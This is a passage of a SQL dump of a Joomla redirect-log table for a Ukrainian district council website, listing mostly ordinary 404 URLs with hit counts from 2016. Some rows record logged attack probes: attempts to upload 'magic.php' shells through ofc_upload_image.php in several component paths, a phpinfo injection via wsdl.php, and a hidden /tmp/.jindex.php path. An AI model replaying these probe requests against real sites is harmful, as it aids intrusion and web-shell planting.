00:00:00',301),(26456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=743:2012-07-26-08-11-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-02-27 11:59:48','0000-00-00 00:00:00',301),(26457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=646:2012-04-08-07-58-55&catid=11&lang=uk&Itemid=','','','',3,0,'2016-02-27 12:00:04','0000-00-00 00:00:00',301),(26458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=663:-------20042012675-12&catid=41:--27042012-&Itemid=78&lang=uk','','','',6,0,'2016-02-27 12:09:20','0000-00-00 00:00:00',301),(26459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45&Itemid=84&lang=uk','','','',3,0,'2016-02-27 12:10:49','0000-00-00 00:00:00',301),(26460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=570:2012-02-09-07-20-52&catid=11&Itemid=14&lang=uk','','','',4,0,'2016-02-27 12:12:51','0000-00-00 00:00:00',301),(26461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=225:--2011----&catid=11&Itemid=16&lang=en','','','',1,0,'2016-02-27 12:16:12','0000-00-00 00:00:00',301),(26462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=646:2012-04-08-07-58-55&catid=11&Itemid=14&lang=ru','','','',4,0,'2016-02-27 12:35:59','0000-00-00 00:00:00',301),(26463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-02-27 12:36:14','0000-00-00 00:00:00',301),(26464,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=20','','','',2,0,'2016-02-27 12:37:27','0000-00-00 00:00:00',301),(26465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=998:1&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-02-27 13:10:10','0000-00-00 00:00:00',301),(26466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=225:--2011----&catid=11&Itemid=16&lang=uk','','','',1,0,'2016-02-27 13:14:17','0000-00-00 00:00:00',301),(26467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=889:-2013-&catid=46:--21122012&Itemid=85&lang=uk','','','',4,0,'2016-02-27 13:32:49','0000-00-00 00:00:00',301),(26468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36&layout=blog&Itemid=70&lang=uk','','','',1,0,'2016-02-27 13:32:50','0000-00-00 00:00:00',301),(26469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=646:2012-04-08-07-58-55&catid=11&lang=ru&Itemid=0','','','',5,0,'2016-02-27 13:41:29','0000-00-00 00:00:00',301),(26470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-02-27 14:08:04','0000-00-00 00:00:00',301),(26471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=284:2011-04-08-07-49-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-02-27 14:09:31','0000-00-00 00:00:00',301),(26472,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-27 14:23:29','0000-00-00 00:00:00',301),(26473,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=18:2010-06-06-10-06-41&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-27 14:25:49','0000-00-00 00:00:00',301),(26474,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014?start=5','','','',24,0,'2016-02-27 14:25:56','0000-00-00 00:00:00',301),(26475,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=20','','','',9,0,'2016-02-27 14:29:44','0000-00-00 00:00:00',301),(26476,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1066--23-?lang=ru','','','',1,0,'2016-02-27 14:29:48','0000-00-00 00:00:00',301),(26477,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1216--q-q?lang=en','','','',2,0,'2016-02-27 14:29:52','0000-00-00 00:00:00',301),(26478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33:-20052011&Itemid=66&lang=en','','','',13,0,'2016-02-27 14:30:13','0000-00-00 00:00:00',301),(26479,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/1221-2014-02-22-08-09-27?Itemid=0&lang=ru','','','',3,0,'2016-02-27 14:30:42','0000-00-00 00:00:00',301),(26480,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1215--1200-?lang=en','','','',1,0,'2016-02-27 14:30:46','0000-00-00 00:00:00',301),(26481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=537:2012-01-23-06-57-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-27 14:34:54','0000-00-00 00:00:00',301),(26482,'http://malyn-rayrada.org.ua/index.jsp/','','','',1,0,'2016-02-27 14:42:52','0000-00-00 00:00:00',301),(26483,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=841:2012-12-10-13-54-17&Itemid=85&lang=en&option=com_content&view=article','','','',14,0,'2016-02-27 14:54:39','0000-00-00 00:00:00',301),(26484,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/990--2013-?Itemid=0&lang=ru','','','',1,0,'2016-02-27 14:55:31','0000-00-00 00:00:00',301),(26485,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1216--q-q?Itemid=0&lang=en','','','',3,0,'2016-02-27 14:55:36','0000-00-00 00:00:00',301),(26486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=605:-l-r-i-iii-&catid=11&lang=en','','','',1,0,'2016-02-27 15:09:13','0000-00-00 00:00:00',301),(26487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=ru&limitstart=10','','','',1,0,'2016-02-27 15:09:19','0000-00-00 00:00:00',301),(26488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=123:2010-09-09-11-29-29&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',1,0,'2016-02-27 15:09:34','0000-00-00 00:00:00',301),(26489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6&Itemid=9&lang=en','','','',2,0,'2016-02-27 15:11:15','0000-00-00 00:00:00',301),(26490,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=813:2012-11-12-16-44-40','','','',1,0,'2016-02-27 15:36:10','0000-00-00 00:00:00',301),(26491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-02-27 15:36:18','0000-00-00 00:00:00',301),(26492,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=956:2013-03-07-14-51-33','','','',1,0,'2016-02-27 15:36:39','0000-00-00 00:00:00',301),(26493,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37&Itemid=72&lang=uk','','','',9,0,'2016-02-27 15:39:45','0000-00-00 00:00:00',301),(26494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40:--28032012-&Itemid=77&lang=en','','','',36,0,'2016-02-27 15:39:58','0000-00-00 00:00:00',301),(26495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=66:2010-07-21-07-33-49&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',5,0,'2016-02-27 15:51:26','0000-00-00 00:00:00',301),(26496,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&Itemid=14&lang=en','','','',6,0,'2016-02-27 15:51:36','0000-00-00 00:00:00',301),(26497,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=225:--2011----&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',1,0,'2016-02-27 15:52:51','0000-00-00 00:00:00',301),(26498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29&Itemid=60&lang=en','','','',1,0,'2016-02-27 15:52:57','0000-00-00 00:00:00',301),(26499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2016-02-27 15:53:16','0000-00-00 00:00:00',301),(26500,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=30:--30122010-&option=com_content&Itemid=3&lang=en','','','',1,0,'2016-02-27 16:31:38','0000-00-00 00:00:00',301),(26501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6&Itemid=9&lang=uk','','','',1,0,'2016-02-27 16:32:43','0000-00-00 00:00:00',301),(26502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=98:-r-&catid=26:--11082010-&Itemid=54&lang=uk','','','',2,0,'2016-02-27 16:34:31','0000-00-00 00:00:00',301),(26503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=549:-2010-2012-&catid=39&Itemid=76&lang=en','','','',1,0,'2016-02-27 16:46:23','0000-00-00 00:00:00',301),(26504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42:--16052012-&Itemid=80&lang=en','','','',2,0,'2016-02-27 17:03:22','0000-00-00 00:00:00',301),(26505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=en&limitstart=5','','','',7,0,'2016-02-27 17:03:35','0000-00-00 00:00:00',301),(26506,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38&Itemid=73&lang=ru','','','',3,0,'2016-02-27 17:04:44','0000-00-00 00:00:00',301),(26507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=50:2010-06-16-14-17-25&catid=1:-14052010&Itemid=10&lang=ru','','','',1,0,'2016-02-27 17:05:14','0000-00-00 00:00:00',301),(26508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=88&lang=en&limitstart=5','','','',5,0,'2016-02-27 17:05:43','0000-00-00 00:00:00',301),(26509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=68:2010-07-22-11-16-14&catid=11&Itemid=16&lang=ru','','','',2,0,'2016-02-27 17:27:46','0000-00-00 00:00:00',301),(26510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=en&limitstart=5','','','',4,0,'2016-02-27 17:28:44','0000-00-00 00:00:00',301),(26511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=en','','','',3,0,'2016-02-27 17:28:45','0000-00-00 00:00:00',301),(26512,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=50:2010-06-16-14-17-25&catid=1&Itemid=10&lang=uk','','','',1,0,'2016-02-27 18:00:22','0000-00-00 00:00:00',301),(26513,'http://www.malyn-rayrada.org.ua/index.php/--29112013-/658-pro-stan-ohoroni-ob’ekta-nezavershenogo','','','',2,0,'2016-02-27 18:01:07','0000-00-00 00:00:00',301),(26514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=uk&limitstart=10','','','',1,0,'2016-02-27 18:01:12','0000-00-00 00:00:00',301),(26515,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/978--6612-?lang=ru&Itemid=0','','','',1,0,'2016-02-27 18:08:28','0000-00-00 00:00:00',301),(26516,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=uk&limitstart=0','','','',2,0,'2016-02-27 18:30:27','0000-00-00 00:00:00',301),(26517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=130:-2011-&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',2,0,'2016-02-27 19:56:41','0000-00-00 00:00:00',301),(26518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=ru','','','',5,0,'2016-02-27 19:56:46','0000-00-00 00:00:00',301),(26519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=470:--------l---r&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-02-27 19:56:56','0000-00-00 00:00:00',301),(26520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=283:c-&catid=11&Itemid=14&lang=en','','','',1,0,'2016-02-27 19:57:01','0000-00-00 00:00:00',301),(26522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=237:-2010-&catid=11&lang=uk','','','',1,0,'2016-02-27 20:26:56','0000-00-00 00:00:00',301),(26523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=54:--29112013-&layout=blog&Itemid=95&lang=en','','','',1,0,'2016-02-27 20:27:10','0000-00-00 00:00:00',301),(26525,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1216:-q-q','','','',1,0,'2016-02-28 03:39:30','0000-00-00 00:00:00',301),(26526,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1066:-23-','','','',1,0,'2016-02-28 03:39:46','0000-00-00 00:00:00',301),(26527,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1130-2013-11-07-14-04-12?Itemid=0&lang=ru','','','',11,0,'2016-02-28 15:14:15','0000-00-00 00:00:00',301),(26528,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?lang=uk','','','',1,0,'2016-02-28 15:17:01','0000-00-00 00:00:00',301),(26529,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=1102:2013-10-03-08-08-33','','','',1,0,'2016-02-28 15:17:09','0000-00-00 00:00:00',301),(26530,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=976:2013-03-21-18-42-06','','','',1,0,'2016-02-28 15:17:10','0000-00-00 00:00:00',301),(26531,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=745:2012-07-30-09-12-07','','','',1,0,'2016-02-28 15:17:11','0000-00-00 00:00:00',301),(26532,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=745:2012-07-30-09-12-07','','','',1,0,'2016-02-28 15:17:12','0000-00-00 00:00:00',301),(26533,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/753-2012-09-05-09-48-36?lang=en','','','',1,0,'2016-02-28 15:17:17','0000-00-00 00:00:00',301),(26534,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=753:2012-09-05-09-48-36','','','',1,0,'2016-02-28 15:17:19','0000-00-00 00:00:00',301),(26535,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=956:2013-03-07-14-51-33','','','',1,0,'2016-02-28 15:17:20','0000-00-00 00:00:00',301),(26536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2016-02-28 20:57:33','0000-00-00 00:00:00',301),(26537,'http://malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=597:-l-r-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-28 23:26:28','0000-00-00 00:00:00',301),(26538,'http://malyn-rayrada.org.ua/index.php?catid=21:2010-06-07-09-43-24&id=27:2010-06-07-11-05-24&itemid=47&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-29 00:03:13','0000-00-00 00:00:00',301),(26539,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=466:-l-r-2011-&Itemid=73&lang=en&option=com_content&view=article','','','',41,0,'2016-02-29 00:16:59','0000-00-00 00:00:00',301),(26540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2016-02-29 02:24:27','0000-00-00 00:00:00',301),(26541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=283:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-29 05:32:04','0000-00-00 00:00:00',301),(26550,'http://malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-02-29 12:27:41','0000-00-00 00:00:00',301),(26551,'http://malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&lang=en&option=com_content&view=article','','','',1,0,'2016-02-29 15:43:27','0000-00-00 00:00:00',301),(26552,'http://malyn-rayrada.org.ua/tmp/.jindex.php','','','',1,0,'2016-02-29 16:22:03','0000-00-00 00:00:00',301),(26553,'http://malyn-rayrada.org.ua/wsdl.php?adv=phpinfo(INFO_GENERAL);','','','',1,0,'2016-02-29 16:22:04','0000-00-00 00:00:00',301),(26554,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=878:2012-12-21-16-59-28&Itemid=85&lang=ru&option=com_content&view=article','','','',7,0,'2016-02-29 16:33:53','0000-00-00 00:00:00',301),(26555,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1216--q-q?lang=ru','','','',3,0,'2016-02-29 16:34:47','0000-00-00 00:00:00',301),(26556,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=830:2012-11-27-08-09-31&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-29 16:35:34','0000-00-00 00:00:00',301),(26557,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=830:2012-11-27-08-09-31','','','',28,0,'2016-02-29 16:35:38','0000-00-00 00:00:00',301),(26558,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/830-2012-11-27-08-09-31?lang=ru','','','',3,0,'2016-02-29 16:35:43','0000-00-00 00:00:00',301),(26559,'http://malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1277:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-29 21:45:10','0000-00-00 00:00:00',301),(26560,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:01:56','0000-00-00 00:00:00',301),(26561,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:01:56','0000-00-00 00:00:00',301),(26562,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:01:57','0000-00-00 00:00:00',301),(26563,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:01:58','0000-00-00 00:00:00',301),(26564,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:01:59','0000-00-00 00:00:00',301),(26565,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:01:59','0000-00-00 00:00:00',301),(26566,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:00','0000-00-00 00:00:00',301),(26567,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:00','0000-00-00 00:00:00',301),(26568,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:00','0000-00-00 00:00:00',301),(26569,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:02','0000-00-00 00:00:00',301),(26570,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:03','0000-00-00 00:00:00',301),(26571,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:03','0000-00-00 00:00:00',301),(26572,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:03','0000-00-00 00:00:00',301),(26573,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:05','0000-00-00 00:00:00',301),(26574,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:06','0000-00-00 00:00:00',301),(26575,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:06','0000-00-00 00:00:00',301),(26576,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:07','0000-00-00 00:00:00',301),(26577,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:07','0000-00-00 00:00:00',301),(26578,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:08','0000-00-00 00:00:00',301),(26579,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:08','0000-00-00 00:00:00',301),(26580,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:08','0000-00-00 00:00:00',301),(26581,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:09','0000-00-00 00:00:00',301),(26582,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-02-29 23:02:09','0000-00-00 00:00:00',301),(26583,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-02-29 23:02:09','0000-00-00 00:00:00',301),(26584,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&lang=en&option=com_content&view=article','','','',5,0,'2016-03-01 00:24:11','0000-00-00 00:00:00',301),(26585,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=905:-2012-2015-&Itemid=86&lang=ru&option=com_content&view=article','','','',7,0,'2016-03-01 04:50:12','0000-00-00 00:00:00',301),(26586,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1102:2013-10-03-08-08-33&Itemid=14&lang=uk&option=com_content&view=article','','','',11,0,'2016-03-01 04:58:50','0000-00-00 00:00:00',301),(26587,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=18:2010-06-06-10-06-41','','','',1,0,'2016-03-01 05:13:42','0000-00-00 00:00:00',301),(26588,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=462:------2012-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-01 12:07:50','0000-00-00 00:00:00',301),(26589,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=839:2012-12-07-08-59-49','','','',1,0,'2016-03-01 12:24:25','0000-00-00 00:00:00',301),(26590,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=14&lang=uk&option=com_content&view=article','','','',26,0,'2016-03-01 13:14:42','0000-00-00 00:00:00',301),(26591,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=&lang=uk&option=com_content&view=article','','','',44,0,'2016-03-01 13:16:24','0000-00-00 00:00:00',301),(26592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=680:2012-05-17-10-02-41&catid=42:--16052012-&Itemid=80&lang=en','','','',8,0,'2016-03-01 13:19:12','0000-00-00 00:00:00',301),(26593,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=18:2010-06-06-10-06-41&Itemid=18&lang=en&option=com_content&view=article','','','',16,0,'2016-03-01 13:19:30','0000-00-00 00:00:00',301),(26594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-03-01 13:19:51','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (26595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=641:2012-04-03-12-52-00&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',20,0,'2016-03-01 13:20:34','0000-00-00 00:00:00',301),(26596,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=615:-------26032012495-12&Itemid=77&lang=en&option=com_content&view=article','','','',18,0,'2016-03-01 13:20:36','0000-00-00 00:00:00',301),(26597,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=740:-lr-&Itemid=82&lang=en&option=com_content&view=article','','','',19,0,'2016-03-01 13:20:40','0000-00-00 00:00:00',301),(26598,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=825:-q-q&Itemid=14&lang=en&option=com_content&view=article','','','',10,0,'2016-03-01 13:20:41','0000-00-00 